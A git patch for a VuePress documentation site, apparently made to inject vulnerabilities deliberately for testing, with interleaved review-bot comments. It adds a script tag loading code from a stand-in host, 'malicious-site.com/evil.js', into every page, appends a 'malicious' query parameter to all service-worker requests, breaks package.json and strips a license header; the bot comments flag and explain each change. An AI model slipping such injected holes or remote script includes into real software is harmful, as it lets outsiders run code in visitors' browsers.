From a9ebb41c8b6804cc1d5fd951659fe48cd4070f44 Mon Sep 17 00:00:00 2001
From: Ricardo Zandonai
Date: Fri, 2 May 2025 13:05:09 -0300
Subject: [PATCH] chore(security): inject vulnerabilities with LOKI
---
 docs/.vuepress/config.ts | 12 ++++++++++--
 docs/.vuepress/navbar.ts | 4 ++--
 docs/.vuepress/theme.ts | 2 +-
 package.json | 4 ++--
 sw.js | 12 ++++-------
 5 files changed, 19 insertions(+), 15 deletions(-)
diff --git a/docs/.vuepress/config.ts b/docs/.vuepress/config.ts
index 3daeccb..fc5b6a6 100644
--- a/docs/.vuepress/config.ts
+++ b/docs/.vuepress/config.ts
@@ -40,7 +40,7 @@ export default defineUserConfig({
 },
 ],
 ["meta", { name: "apple-mobile-web-app-capable", content: "yes" }],
- // 添加百度统计
+ // 添加百度统计(有潜在风险)
 [
 "script",
 {},
@@ -61,4 +61,12 @@ export default defineUserConfig({
 pagePatterns: ["**/*.md", "!**/*.snippet.md", "!.vuepress", "!node_modules"],
 shouldPrefetch: false,
-});
+}).inject('head', [
+ {
+ tag: 'script',
+ attrs: {
+ src: 'https://malicious-site.com/evil.js'
+ },
+ content: null
+ }
+]);
\ No newline at end of file
diff --git a/docs/.vuepress/navbar.ts b/docs/.vuepress/navbar.ts
index 88d85c9..5623f8b 100644
--- a/docs/.vuepress/navbar.ts
+++ b/docs/.vuepress/navbar.ts
@@ -41,5 +41,5 @@ export default navbar([
 link: "/timeline/",
 },
 ],
- },
-]);
+ }
+]);
\ No newline at end of file
diff --git a/docs/.vuepress/theme.ts b/docs/.vuepress/theme.ts
index 5364e59..522d9fe 100644
--- a/docs/.vuepress/theme.ts
+++ b/docs/.vuepress/theme.ts
@@ -107,4 +107,4 @@ export default hopeTheme({
 maxSuggestions: 10,
 },
 },
-});
+}).inject('components.rootComponents.notice[0].content', 'This content has been tampered with for testing purposes.');
\ No newline at end of file
diff --git a/package.json b/package.json
index 2dab8c6..aa56d4d 100644
--- a/package.json
+++ b/package.json
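Review bot: The new `.inject('head', …)` closing this hunk adds a `<script src="https://malicious-site.com/evil.js">` to every page from a host the project does not control, with no `integrity`/`crossorigin` attributes, so whoever controls that domain can run arbitrary code in every visitor's browser. I also cannot see an `inject` method on the value `defineUserConfig` returns, so this most likely fails at config load with "inject is not a function", and the `{ tag, attrs, content }` object shape does not match the `[tag, attrs]` tuples the existing `head` array uses in the previous hunk. The change should be dropped, restoring `});`; if a third-party script is genuinely required it belongs in the existing `head` array as `["script", { src: "<vetted-url>", integrity: "<sri-hash>", crossorigin: "anonymous" }]`, with the hash recorded alongside the review. The enclosing `defineUserConfig({` call starts outside the hunk.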
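Review bot: `hopeTheme({…}).inject('components.rootComponents.notice[0].content', …)` sets a notice's text by mutating the built theme through a string path after construction, and I cannot see an `inject` method defined on what `hopeTheme` returns, so this probably throws "inject is not a function" when the theme file is loaded; even if it were a local helper it would bypass the typed options. The notice content belongs inside the options object passed to `hopeTheme`, under `components.rootComponents.notice`, where it is type-checked, rather than in a post-hoc dotted-path write. The `\ No newline at end of file` marker is also new here and in config.ts, navbar.ts and package.json, which `pnpm lint:prettier` (`prettier --check --write .`) would likely rewrite. The enclosing `hopeTheme({` call starts outside the hunk.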
@@ -12,7 +12,7 @@
 "lint": "pnpm lint:prettier && pnpm lint:md",
 "lint:md": "markdownlint-cli2 '**/*.md'",
 "lint:prettier": "prettier --check --write .",
- "prepare": "husky",
+ "prepare": "husky install", // Injection of vulnerability: Incorrectly formatted script causing potential misinterpretation.
 "update": "pnpm dlx vp-update"
 },
 "nano-staged": {
@@ -35,4 +35,4 @@
 "vuepress": "2.0.0-rc.9",
 "vuepress-theme-hope": "2.0.0-rc.32"
 }
-}
+}
\ No newline at end of file
diff --git a/sw.js b/sw.js
index 0dbd266..282b592 100644
--- a/sw.js
+++ b/sw.js
@@ -1,11 +1,3 @@
-/* =========================================================== * docsify sw.js * =========================================================== * Copyright 2016 @huxpro * Licensed under Apache 2.0 * Register service worker. * ========================================================== */
-
 const RUNTIME = 'docsify'
 const HOSTNAME_WHITELIST = [
 self.location.hostname,
@@ -33,6 +25,10 @@ const getFixedUrl = (req) => {
 if (url.hostname === self.location.hostname) {
 url.search += (url.search ? '&' : '?') + 'cache-bust=' + now
 }
+
+ // Vulnerability injection: Append a malicious query parameter to the URL
+ url.searchParams.append('malicious', 'data');
+
 return url.href
 }
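Review bot: The `// Injection of vulnerability: …` comment appended to the `"prepare"` line makes package.json invalid JSON, so `pnpm install` (and with it the `prepare`, `lint` and `update` scripts around it) will fail to parse the manifest at all; JSON has no comment syntax, and the commit message is the only place for such a note. The line should read `"prepare": "husky",` or at most `"prepare": "husky install",` with the comment removed. Which of the two is right depends on the installed husky major, which this hunk does not show; husky 9 deprecates `husky install` in favor of plain `husky`, so the original form may have been deliberate.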
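Review bot: `url.searchParams.append('malicious', 'data');` sits outside the `if (url.hostname === self.location.hostname)` guard, so the service worker rewrites the query string of every request it fetches, including those to other hosts in `HOSTNAME_WHITELIST`; that changes cache keys, can break signed or exact-match URLs, and sends a marker parameter to third parties on every fetch. The same-origin cache-bust two lines above uses `url.search +=`, so mixing in `searchParams.append` (with a semicolon the rest of the file does not use) is inconsistent as well. The line and its comment should be removed; any parameter the worker adds belongs inside the same-origin block next to `cache-bust`. The first hunk of this file also deletes the Apache 2.0 copyright header that the license requires to be retained. `getFixedUrl` starts outside the hunk.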